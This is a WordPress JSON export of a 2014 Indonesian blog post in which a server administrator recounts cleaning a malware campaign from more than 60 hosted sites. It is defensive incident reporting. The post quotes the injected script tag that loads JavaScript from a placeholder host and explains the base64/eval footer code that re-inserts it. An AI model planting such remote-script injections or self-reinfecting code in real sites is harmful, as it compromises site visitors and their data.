{"id":484,"date":"2014-12-18T05:57:57","date_gmt":"2014-12-18T05:57:57","guid":{"rendered":"http:\/\/zaf.web.id\/blog\/?p=484"},"modified":"2014-12-27T07:02:14","modified_gmt":"2014-12-27T07:02:14","slug":"serangan-campaign-malware","status":"publish","type":"post","link":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/","title":{"rendered":"Serangan Campaign Malware"},"content":{"rendered":"<p>Hari ini dipenghujung tahun 2014 ini adalah hari paling merepotkan selama mengelola salah satu Cloud milik LRsoft.\u00a0Pasalnya server mendapat kado natal istimewa berupa malware yang menginfeksi 60 lebih website yang\u00a0ada didalamnya, sehingga ketika domain web tersebut diakses via browser akan muncul peringatan block halaman dari layanan Google seperti gambar dibawah:<\/p>\n<figure id=\"attachment_485\" aria-describedby=\"caption-attachment-485\" style=\"width: 626px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" class=\" wp-image-485\" src=\"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png?resize=626%2C390\" alt=\"Block dari Google\" width=\"626\" height=\"390\" srcset=\"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png?w=818&amp;ssl=1 818w, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png?resize=300%2C187&amp;ssl=1 300w, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png?resize=619%2C385&amp;ssl=1 619w\" sizes=\"auto, (max-width: 626px) 100vw, 626px\" \/><\/a><figcaption id=\"caption-attachment-485\" class=\"wp-caption-text\">Block dari Google<\/figcaption><\/figure>\n<p><!--more-->Cek di cek ternyata Malware tersebuat menyerang bagian header dari website, mengganti semua tag<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">&lt;\/head&gt;<\/pre>\n<p>dengan script malware yang\u00a0disimpan di server lain<\/p>\n<pre class=\"brush: php; title: ; notranslate\" title=\"\">&lt;script language=&quot;JavaScript&quot; src=&quot;http:\/\/host\/malware.js&quot; type=&quot;text\/javascript&quot;&gt;&lt;\/script&gt;<\/pre>\n<p>dan jeleknya tag<em> &lt;head&gt;<\/em> juga tidak ditutup kembali -_-<\/p>\n<p><em>Script<\/em> tersebut berfungsi untuk mengambil\u00a0informasi sensitif yang ada di <em>browser<\/em> (komputer) <em>client<\/em>, salah satu <em>file<\/em>\u00a0milik <em>WordPress<\/em> yang\u00a0<a href=\"http:\/\/pastebin.com\/b4hsDyLA\" target=\"_blank\">terinfeksi<\/a>.\u00a0Cukup membuat pusing karena sebelumnya harus melakukan analisis terlebih dahulu terhadap <em>file<\/em>&#8211;<em>file<\/em>\u00a0yang mencurigakan. Dari beberapa <em>file<\/em>\u00a0yang terinfeksi ternyata <em>script<\/em> berbahayanya\u00a0diletakkan di bagian <em>&lt;head&gt;<\/em> dengan menampilkan langsung <em>URL<\/em> lokasi <em>malware<\/em> dan di bagian\u00a0<em>footer<\/em> dengan enkripsi\u00a0fungsi <em>base64_encode()<\/em> dan dieksekusi oleh fungsi<em> eval()<\/em>.<\/p>\n<p>Yang diletakkan dibagian <em>footer<\/em>\u00a0berfungsi untuk\u00a0menjalankan kembali <em>malware<\/em> (menyisipkan <em>script<\/em> berbahaya\u00a0di bagian <em>&lt;head&gt;<\/em>) jika suatu waktu <em>script<\/em> berbahaya yang diletakkan dalam <em>file<\/em> telah dihapus oleh <em>admin<\/em>. Mengingat\u00a0ada banyak <em>website<\/em> yang ada dalam 1 <em>server<\/em>, dikali jumlah <em>file<\/em> yang ada dalam masing-masing <em>website<\/em>, tidak cukup waktu untuk mengecek satu per-satu <em>file<\/em> secara manual. Saya membuat <em>script<\/em> untuk melakukan pencarian <em>file<\/em>&#8211;<em>file<\/em> yang sudah terinfeksi dengan metode <em>recursive<\/em> <em>scanning<\/em> dengan kombinasi <em>RegEx<\/em>. Dengan script yang sama dapat memulihkan file-file yang terinfeksi dengan otomatis menghapus script berbahaya dari file tersebut.<\/p>\n<p>Kini semua\u00a0<em>file<\/em>\u00a0sudah bersih, termasuk <em>file<\/em>&#8211;<em>file<\/em> pendukung lainnya yang digunakan oleh attacker untuk menyerang sudah dihapus. Tinggal menunggu tindakan dari\u00a0<em>Google<\/em> (24 jam) untuk\u00a0menghapus predikat <em>Malware<\/em> dari database <em>Safe<\/em> <em>Browse<\/em> mereka sehingga pengunjung dapat membuka kembali <em>website<\/em>&#8211;<em>website<\/em> yang sebelumnya di blok oleh G<em>oogle.<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>Reference :\u00a0<a href=\"http:\/\/blog.sucuri.net\/2014\/12\/soaksoak-malware-compromises-100000-wordpress-websites.html\" target=\"_blank\">http:\/\/blog.sucuri.net\/2014\/12\/soaksoak-malware-compromises-100000-wordpress-websites.html<\/a><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hari ini dipenghujung tahun 2014 ini adalah hari paling merepotkan selama mengelola salah satu Cloud&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_crdt_document":"","_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[58],"tags":[],"class_list":["post-484","post","type-post","status-publish","format-standard","hentry","category-server"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Serangan Campaign Malware - Ahmad Zafrullah<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/\" \/>\n<meta property=\"og:locale\" content=\"id_ID\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Serangan Campaign Malware - Ahmad Zafrullah\" \/>\n<meta property=\"og:description\" content=\"Hari ini dipenghujung tahun 2014 ini adalah hari paling merepotkan selama mengelola salah satu Cloud&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"Ahmad Zafrullah\" \/>\n<meta property=\"article:publisher\" content=\"http:\/\/www.facebook.com\/23Pstars\" \/>\n<meta property=\"article:author\" content=\"http:\/\/www.facebook.com\/23Pstars\" \/>\n<meta property=\"article:published_time\" content=\"2014-12-18T05:57:57+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2014-12-27T07:02:14+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png\" \/>\n<meta name=\"author\" content=\"Zaf\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@23Pstars\" \/>\n<meta name=\"twitter:site\" content=\"@23Pstars\" \/>\n<meta name=\"twitter:label1\" content=\"Ditulis oleh\" \/>\n\t<meta name=\"twitter:data1\" content=\"Zaf\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimasi waktu membaca\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 menit\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/\"},\"author\":{\"name\":\"Zaf\",\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/#\\\/schema\\\/person\\\/ba4e955d59a1e6a8284857e74b14e5ed\"},\"headline\":\"Serangan Campaign Malware\",\"datePublished\":\"2014-12-18T05:57:57+00:00\",\"dateModified\":\"2014-12-27T07:02:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/\"},\"wordCount\":338,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/#\\\/schema\\\/person\\\/ba4e955d59a1e6a8284857e74b14e5ed\"},\"image\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2014\\\/12\\\/malware-frommshead.php_.png\",\"articleSection\":[\"Server\"],\"inLanguage\":\"id\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/\",\"url\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/\",\"name\":\"Serangan Campaign Malware - Ahmad Zafrullah\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#primaryimage\"},\"thumbnailUrl\":\"http:\\\/\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2014\\\/12\\\/malware-frommshead.php_.png\",\"datePublished\":\"2014-12-18T05:57:57+00:00\",\"dateModified\":\"2014-12-27T07:02:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#breadcrumb\"},\"inLanguage\":\"id\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"id\",\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#primaryimage\",\"url\":\"http:\\\/\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2014\\\/12\\\/malware-frommshead.php_.png\",\"contentUrl\":\"http:\\\/\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2014\\\/12\\\/malware-frommshead.php_.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/serangan-campaign-malware\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Serangan Campaign Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/\",\"name\":\"Ahmad Zafrullah\",\"description\":\"Work to Learn is better than Learn how to Work\",\"publisher\":{\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/#\\\/schema\\\/person\\\/ba4e955d59a1e6a8284857e74b14e5ed\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"id\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/#\\\/schema\\\/person\\\/ba4e955d59a1e6a8284857e74b14e5ed\",\"name\":\"Zaf\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"id\",\"@id\":\"https:\\\/\\\/i0.wp.com\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1\",\"width\":300,\"height\":300,\"caption\":\"Zaf\"},\"logo\":{\"@id\":\"https:\\\/\\\/i0.wp.com\\\/zaf.web.id\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/09\\\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1\"},\"sameAs\":[\"http:\\\/\\\/zaf.web.id\",\"http:\\\/\\\/www.facebook.com\\\/23Pstars\",\"https:\\\/\\\/x.com\\\/23Pstars\"],\"url\":\"https:\\\/\\\/zaf.web.id\\\/blog\\\/author\\\/zaf\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Serangan Campaign Malware - Ahmad Zafrullah","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/","og_locale":"id_ID","og_type":"article","og_title":"Serangan Campaign Malware - Ahmad Zafrullah","og_description":"Hari ini dipenghujung tahun 2014 ini adalah hari paling merepotkan selama mengelola salah satu Cloud&hellip;","og_url":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/","og_site_name":"Ahmad Zafrullah","article_publisher":"http:\/\/www.facebook.com\/23Pstars","article_author":"http:\/\/www.facebook.com\/23Pstars","article_published_time":"2014-12-18T05:57:57+00:00","article_modified_time":"2014-12-27T07:02:14+00:00","og_image":[{"url":"http:\/\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png","type":"","width":"","height":""}],"author":"Zaf","twitter_card":"summary_large_image","twitter_creator":"@23Pstars","twitter_site":"@23Pstars","twitter_misc":{"Ditulis oleh":"Zaf","Estimasi waktu membaca":"2 menit"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#article","isPartOf":{"@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/"},"author":{"name":"Zaf","@id":"https:\/\/zaf.web.id\/blog\/#\/schema\/person\/ba4e955d59a1e6a8284857e74b14e5ed"},"headline":"Serangan Campaign Malware","datePublished":"2014-12-18T05:57:57+00:00","dateModified":"2014-12-27T07:02:14+00:00","mainEntityOfPage":{"@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/"},"wordCount":338,"commentCount":0,"publisher":{"@id":"https:\/\/zaf.web.id\/blog\/#\/schema\/person\/ba4e955d59a1e6a8284857e74b14e5ed"},"image":{"@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#primaryimage"},"thumbnailUrl":"http:\/\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png","articleSection":["Server"],"inLanguage":"id","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/","url":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/","name":"Serangan Campaign Malware - Ahmad Zafrullah","isPartOf":{"@id":"https:\/\/zaf.web.id\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#primaryimage"},"image":{"@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#primaryimage"},"thumbnailUrl":"http:\/\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png","datePublished":"2014-12-18T05:57:57+00:00","dateModified":"2014-12-27T07:02:14+00:00","breadcrumb":{"@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#breadcrumb"},"inLanguage":"id","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/"]}]},{"@type":"ImageObject","inLanguage":"id","@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#primaryimage","url":"http:\/\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png","contentUrl":"http:\/\/zaf.web.id\/blog\/wp-content\/uploads\/2014\/12\/malware-frommshead.php_.png"},{"@type":"BreadcrumbList","@id":"https:\/\/zaf.web.id\/blog\/serangan-campaign-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zaf.web.id\/blog\/"},{"@type":"ListItem","position":2,"name":"Serangan Campaign Malware"}]},{"@type":"WebSite","@id":"https:\/\/zaf.web.id\/blog\/#website","url":"https:\/\/zaf.web.id\/blog\/","name":"Ahmad Zafrullah","description":"Work to Learn is better than Learn how to Work","publisher":{"@id":"https:\/\/zaf.web.id\/blog\/#\/schema\/person\/ba4e955d59a1e6a8284857e74b14e5ed"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zaf.web.id\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"id"},{"@type":["Person","Organization"],"@id":"https:\/\/zaf.web.id\/blog\/#\/schema\/person\/ba4e955d59a1e6a8284857e74b14e5ed","name":"Zaf","image":{"@type":"ImageObject","inLanguage":"id","@id":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/09\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1","url":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/09\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1","contentUrl":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/09\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1","width":300,"height":300,"caption":"Zaf"},"logo":{"@id":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/09\/zaf_auto_x2.jpeg?fit=300%2C300&ssl=1"},"sameAs":["http:\/\/zaf.web.id","http:\/\/www.facebook.com\/23Pstars","https:\/\/x.com\/23Pstars"],"url":"https:\/\/zaf.web.id\/blog\/author\/zaf\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":981,"url":"https:\/\/zaf.web.id\/blog\/serangan-adware-via-htaccess\/","url_meta":{"origin":484,"position":0},"title":"Serangan Adware via .htaccess","author":"Zaf","date":"Desember 17, 2016","format":false,"excerpt":"Bukan pertama kalinya beberapa server kami mendapatkan serangan dengan teknik yang berbagai macam jenis, bentuk, dan dampaknya. Pagi ini\u00a0sempat kaget karena semua website yang ada dalam server Gili Air\u00a0kami diarahkan ke situs iklan ketika diakses dari perangkat mobile. Saat ditelusuri ternyata semua file .htaccess nya telah disusupi semua, untuk mendeteksi\u2026","rel":"","context":"dalam &quot;Server&quot;","block_context":{"text":"Server","link":"https:\/\/zaf.web.id\/blog\/category\/server\/"},"img":{"alt_text":".htaccess malware inject","src":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2016\/12\/Screen-Shot-2016-12-15-at-5.34.42-PM-1024x680.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2016\/12\/Screen-Shot-2016-12-15-at-5.34.42-PM-1024x680.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2016\/12\/Screen-Shot-2016-12-15-at-5.34.42-PM-1024x680.png?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":1954,"url":"https:\/\/zaf.web.id\/blog\/mitigasi-malware-di-web-server-dan-cara-membersihkannya\/","url_meta":{"origin":484,"position":1},"title":"Mitigasi Malware di Web Server dan Cara Membersihkannya","author":"Zaf","date":"November 23, 2022","format":false,"excerpt":"Malware selalu menjadi hal yang merepotkan. Umumnya pembuat malware tidak membuat malware untuk sekedar ajang pamer layaknya defacement. Malware dibuat demi tujuan yang lebih besar dan masif, dan biasanya tidak berjalan secara sendiri-sendiri melainkan menjadi sebuah network atau perkumpulan. Discovery Disuatu pagi tiba-tiba salah satu website yang kami kelola menunjukkan\u2026","rel":"","context":"dalam &quot;Security&quot;","block_context":{"text":"Security","link":"https:\/\/zaf.web.id\/blog\/category\/security\/"},"img":{"alt_text":"Mencari induk malware","src":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2022\/11\/6.-cari-dan-hapus-file-ico.png?fit=795%2C241&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2022\/11\/6.-cari-dan-hapus-file-ico.png?fit=795%2C241&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2022\/11\/6.-cari-dan-hapus-file-ico.png?fit=795%2C241&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2022\/11\/6.-cari-dan-hapus-file-ico.png?fit=795%2C241&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":2067,"url":"https:\/\/zaf.web.id\/blog\/berburu-malware-di-server-linux\/","url_meta":{"origin":484,"position":2},"title":"Berburu Malware di Server Linux","author":"Zaf","date":"Mei 27, 2024","format":false,"excerpt":"Beberapa tahun terakhir sangat banyak website yang tiba-tiba didalamnya terdapat laman dengan kata kunci slot, judi, gacor, dan seterusnya. Ini umumnya diakibatkan kurangnya perhatian terhadap pengelolaan website. Seringnya menggunakan plugin atau template dari sumber yang tidak terpercaya membuat malware bisa dengan mudah memperbanyak diri. Beberapa bulan terakhir cukup aktif untuk\u2026","rel":"","context":"dalam &quot;Security&quot;","block_context":{"text":"Security","link":"https:\/\/zaf.web.id\/blog\/category\/security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/05\/Screenshot-2024-09-05-at-23.45.21.png?fit=1200%2C833&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/05\/Screenshot-2024-09-05-at-23.45.21.png?fit=1200%2C833&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/05\/Screenshot-2024-09-05-at-23.45.21.png?fit=1200%2C833&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/05\/Screenshot-2024-09-05-at-23.45.21.png?fit=1200%2C833&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2024\/05\/Screenshot-2024-09-05-at-23.45.21.png?fit=1200%2C833&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":1053,"url":"https:\/\/zaf.web.id\/blog\/fetching-photo-berdasarkan-tags-di-instagram\/","url_meta":{"origin":484,"position":3},"title":"Fetching photo berdasarkan tags di Instagram","author":"Zaf","date":"Mei 2, 2017","format":false,"excerpt":"Beberapa waktu yang lalu Dwohoo.com menambahkan fitur untuk menampilkan daftar foto yang\u00a0berkaitan dengan destinasi yang sedang dibahas dalam suatu artikel. Foto-foto tersebut diambil secara langsung dari Instagram. Instagram memiliki API bagi para developer yang hendak mengembangkan aplikasi lanjutan, tapi kali ini saya tidak menggunakan API tersebut.\u00a0Selain\u00a0ribet, tahapannya juga cukup banyak\u2026","rel":"","context":"dalam &quot;Programming&quot;","block_context":{"text":"Programming","link":"https:\/\/zaf.web.id\/blog\/category\/programming\/"},"img":{"alt_text":"Sidebar instagram tags","src":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2017\/03\/Screen-Shot-2017-04-08-at-8.46.12-AM-247x300.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":1779,"url":"https:\/\/zaf.web.id\/blog\/logging-report-php-pada-web-server-apache-ke-telegram\/","url_meta":{"origin":484,"position":4},"title":"Logging Report PHP pada Web Server Apache ke Telegram","author":"Zaf","date":"Mei 5, 2021","format":false,"excerpt":"Sistem atau aplikasi yang baik adalah yang memiliki tingkat error yang minim, bahkan jika memungkinkan tidak terdapat error sekecil apapun. Namun seperti yang dikatakan banyak orang, tidak ada sistem yang sempurna, yang ada hanya bagaimana meminimalisir error tersebut. Log membantu developer untuk melakukan identifikasi jika ada hal yang tidak sesuai\u2026","rel":"","context":"dalam &quot;Inspirasi&quot;","block_context":{"text":"Inspirasi","link":"https:\/\/zaf.web.id\/blog\/category\/inspirasi\/"},"img":{"alt_text":"Apache Log Telegram Notif","src":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2021\/05\/telegram-pustik-syslog.png?fit=922%2C573&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2021\/05\/telegram-pustik-syslog.png?fit=922%2C573&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2021\/05\/telegram-pustik-syslog.png?fit=922%2C573&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2021\/05\/telegram-pustik-syslog.png?fit=922%2C573&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":1501,"url":"https:\/\/zaf.web.id\/blog\/upload-file-sederhana-ke-aws-s3-dengan-php\/","url_meta":{"origin":484,"position":5},"title":"Upload File Sederhana ke AWS S3 dengan PHP","author":"Zaf","date":"Agustus 9, 2020","format":false,"excerpt":"AWS telah menyediakan SDK untuk memudahkan transaksi terhadap beberapa servicenya secara program, salah satu yang disediakan adalah untuk PHP. Namun terkadang kebutuhan tidak sesuai dengan usaha yang harus dikeluarkan. Untuk sekedar upload file ke S3 milik AWS kita perlu load\/download paket lengkap dari SDK nya, rasanya agak berlebihan. Setelah googling\u2026","rel":"","context":"dalam &quot;Programming&quot;","block_context":{"text":"Programming","link":"https:\/\/zaf.web.id\/blog\/category\/programming\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2020\/08\/Screenshot-2024-09-06-at-00.22.03.png?fit=1200%2C813&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2020\/08\/Screenshot-2024-09-06-at-00.22.03.png?fit=1200%2C813&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2020\/08\/Screenshot-2024-09-06-at-00.22.03.png?fit=1200%2C813&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2020\/08\/Screenshot-2024-09-06-at-00.22.03.png?fit=1200%2C813&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/zaf.web.id\/blog\/wp-content\/uploads\/2020\/08\/Screenshot-2024-09-06-at-00.22.03.png?fit=1200%2C813&ssl=1&resize=1050%2C600 3x"},"classes":[]}],"jetpack_likes_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p4zLnS-7O","_links":{"self":[{"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/posts\/484","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/comments?post=484"}],"version-history":[{"count":3,"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/posts\/484\/revisions"}],"predecessor-version":[{"id":490,"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\/posts\/484\/revisions\/490"}],"wp:attachment":[{"href":"https:\/\/zaf.web.id\/blog\/wp-json\/wp\/v2\